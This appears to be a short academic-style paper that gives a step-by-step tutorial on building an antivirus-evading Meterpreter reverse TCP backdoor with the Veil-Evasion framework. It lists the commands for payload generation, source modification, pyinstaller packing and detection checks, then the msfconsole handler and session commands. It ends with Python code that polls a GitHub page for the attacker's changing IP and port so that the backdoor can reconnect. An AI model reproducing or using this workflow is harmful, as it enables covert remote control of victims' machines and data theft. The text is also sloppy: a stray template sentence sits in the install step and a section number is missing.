

Implementing an Undetectable Backdoor by Applying Veil Framework

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Abstract— The Veil-Evasion is a Kali Linux Framework with a selection of tools invented for use during offensive security testing. It permits us to create undetectable backdoors that could control all system instructions without any consumer cognizance. Most of the backdoors are detected by an antivirus program by comparing the file with a massive database of harmful signatures. If the document suits any signature on the database, that record could be considered as a dangerous report. These will be the default settings on each antivirus. Veil evasion combines with the Meterpreter session to execute system commands on the victim's machine, and also this tool will provide us with the source code of the actual payload in different languages such as power-shell, go, python, c, etc. As a result, the possibility of creating a unique signature is unlimited. Then this newly created payload can be injected into a pdf file like this to make the target system vulnerable.

Keywords— Veil, Anti-Virus, Malware, Payloads Undetectable Backdoor, Firewall, Penetration Testing, Remote Desktop Backdoor.

I. INTRODUCTION

Malware has been the most effective way to get into victims' systems for a while now. However, several types of malwares can duplicate themselves to the stage that can wreck the whole system. Overseeing these types of danger drives to antivirus software being more effective too. Because of the tactics utilized by antiviruses, malware created using tools like Metasploit is now easily detectable. As a result, techniques that allow malware to circumvent antivirus detection are being developed. Signature-based, behaviour-based, and heuristic-based practices are three of the most used methods for identifying malware. When an attacker attempts to hack a computer, antivirus is one of the first lines of security they meet. This obstacle was minimal in the past when most of the AV products uses signature-based detection, and the effort required to evade them was insignificant^[1].

The Veil-Evasion is a primary evasion tool that provides the source code of the actual backdoor for the attacker to change. According to attackers, modifying the source code results in a unique signature that may easily trick most antivirus software into thinking it's a helpful one. It is also the most commonly used tool, transforming arbitrary script or piece of shellcode into windows executable undetectable by antivirus^[1].

This payload can then be injected into an actual application to make it appear less suspicious to the victim. While launching the program, the attacker will have total control of the victim's system over the internet.

II. LITERATURE REVIEW

Faisal A. Garba at el^[1] The use of malware is one method of gaining access to a computer. The creation of malware is hugely straightforward, given the abundance of publicly available tools on the Internet. Malware created with technologies like Metasploit is now easily recognized, thanks to antivirus methods. In a reaction to this, means that enable this malware to evade antivirus detection are also developed. As a result, techniques that allow this malware to avoid detection by antivirus software are being created. The Veil Framework is a collection of penetration-testing tools. The most often used program is Veil-Evasion, which can convert any script or piece of shellcode into windows executable undetected by antivirus software. Veil-3.0 may be downloaded from the official Veil- Framework GitHub repository at <https://github.com/Veil-Framework/Veil>. Malicious attackers and penetration testers both employ antivirus evasion methods. Penetration testing is a method used by security experts to evaluate the security of a system. Penetration testing entails assaulting a plan to find flaws that might be exploited by malevolent hackers and informing the customer about those flaws and how to mitigate them. In order to infiltrate a computer network, penetration testers employ the same tools, tactics, and processes as ethical hackers. Therefore, by analysing the efficiency of these antivirus evasion techniques used by black hat hackers and penetration testers to attack computer networks on Windows and Android platforms, there is a need to analyse the efficiency of these evasion techniques used by black hat hackers and penetration testers to breach computer networks.

Yaswanth Kolli at el [2] The next step is to make the payload available to the outside world now that it's possible to build it. Sending an executable payload to the victim's workstation that looks like the real one establishes a reverse TCP connection. As a result, when the victim runs the payload, a session is formed, allowing the attacker to remotely control the system. Attackers commonly target TCP because it is a connection-oriented protocol that allows machines to communicate information. A zero-day exploit is a flaw in unknown software to the general public or the product's developer. As a result, there would be insufficient time to build the patch, giving the attacker an edge. As a result, the attacker uses Zero-day vulnerabilities since their signature will not be recognized by a network firewall or intrusion detection system.

The studies above demonstrate the potential for harm and capabilities when the Metasploit framework is exclusively utilized for criminal reasons. The experiment was carried out in a virtual setting, with the Kali Linux operating system

It constructed a backdoor, a reverse TCP connection with an attacker's system while building the payload. While this may appear to be a simple task, it is all that is required for an attacker to modify other systems to their liking. To ensure the environment's security, anti-virus software disables any unneeded outgoing connections. However, there is a catch. Anti-virus software cannot scan every step of application software to determine if it is safe or not since doing so slows down the entire system's operation and makes it harder to administer. As a result, one of the strategies it employs to avoid is a signature-based inspection of an overall program. They check each program to an extensive database of malware to see if there is any match. If this is the case, the anti-virus firewall will ban that specific process. To acquire this unique signature, we can modify the source code or the generation stages themselves.

IV. RESULTING STEPS

The following process describes how to remotely exploit a Windows machine utilising the Metasploit framework's reverse TCP payload and veil.

A. Step one: Installation

A minimum of one author is required for all conference articles. Download and install the veil framework if it is not installed. To update the package, execute the below commands.

```
apt-get update
apt-get install veil
```

Once the install is finished, we can launch Veil by opening terminal and typing in: veil

B. Step two: Creating payload using veil

There will be two options to go with after opening the veil framework. Evasion is used to create payloads with specific endpoints like a host IP address and port number. It can also be used to create the same in different programming languages. And Ordnance is a tool that can be used to generate valid stager shellcode quickly. "use 1" can be entered to get into evasion. "list command can also be used to list all available options inside the framework.

There are several types and coding languages available when listed payloads. We can select by our own convince. For easy yet powerful way to accomplish undetectable payload, we can use 'python/meterpreter/rev_tcp' and list available options: use 28. All other options can be used to make unique payloads that can easily pass most antivirus. These options can be invoked with 'set' command. To generate payload type in the command 'generate'. Then we have to name the payload such as 'tcp_8080'. hen we will get prompted with conversion to exe. There are two choice: pyinstaller or py2exe.

C. Step three: Changing source file

Now that we have the python file containing code for the payload. it now on 'var/lib/veil/output/source' directory. In order to achieve true anonymity, we have to change the source code to custom.

Now we can use pyinstaller to convert from .py to .exe

```
pyinstaller -F <filename.py>
```


D. Step four: Checking undetectability

we can check the anonymity by uploading the .exe file to antiscan.me and checking whether it passes certain antivirus programs.

Fig. 5. AntiScan page for checking malware on anticirus

E. Step five: Attacking target system

To get access to victims machine they should be connect to internet and somehow invoke this payload executable file (tcp_8080.exe). Attacker should be listening to those specific port on meterpreter. Veil already provided with us a resource file ('var/lib/veil/output/handler/tcp_8080.rc') that can be used to listen to the same configuration of the payload. To invoke meterpreter with resource file :

```
msfconsole -r var/lib/veil/output/handlers/tcp_8080.rc
```

By the time when victim executes the payload file msfconsole will show active section which can be selected to exploit.

To select specific session we can use :

```
sessions -i <session number>
```

The above command can get into an active session without any user's knowledge. At this stage, several system commands can be executed with the help of msfconsole. All the wide verities of commands can be displayed with the help command.

V. PROBLEMS AND FINDINGS

The veil can only give a limited amount of alternatives for creating a distinct signature. For example, when more people use identical payloads, the antivirus will add them to their common database to avoid future attacks. So a unique signature can only be created by delving profound, such as changing the source code itself. We can only target devices on our network (local network) by default, defeating the goal of abusing a user and stealing critical data.

We offer several alternatives for establishing an internet connection. SSH tunnelling, port forwarding, ngrok, no-IP, AWS, and Google cloud are a few examples. SSH tunnelling, port forwarding might not work on several set of networking devices so the best way is to go with ngrock. Ngrok is easy to use but it changes after every sessions.

As a result, making the payload dynamic is complex. AWS, Google Cloud, Azure, other cloud providers, and GitHub are all viable possibilities. For example, a website may be hosted for free on GitHub. As a result, we can host a basic homepage that provides the ngrok IP and port number. We can make the payload dynamic by adding some beautiful soup web scraping code from GitHub to our payload. As a result,

```
fun_action(var_one)
while(1):
    url='https://alansmathew.github.io/hz.github.io/'
    webpage=bs(requests.get(url).text,'html.parser')
    ip_address=str(webpage.find('h1'))[4:-5]
    port_address=int(str(webpage.find('h2'))[4:-5])
    if(ip_address != var_ip or var_por != port_address):
        var_ip=ip_address
        var_por=port_address
        explo(ip_address,port_address)
    time.sleep(1200)
```

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Fig. 6. Code-snippet for getting ip for attacker machine

The code above will check GitHub every 20 minutes to see if the IP or port number has changed. If it is modified, the connection to meterpreter will be restored.

Fig. 7. Shown how bs4 works in fetching live data from GitHub hosted page

VI. CONCLUSION

Veil evasion is a free and open-source penetration testing tool for creating undetectable backdoors. The Veil is convenient for attackers who wish to make a target machine susceptible and test the effectiveness of antivirus software. It is a testing tool that allows penetration testers to conduct client-side attacks on a target system. Using client-side attack vectors, Veil enables a professional penetration tester to examine the actual security posture of a target environment.

VII. REFERENCES

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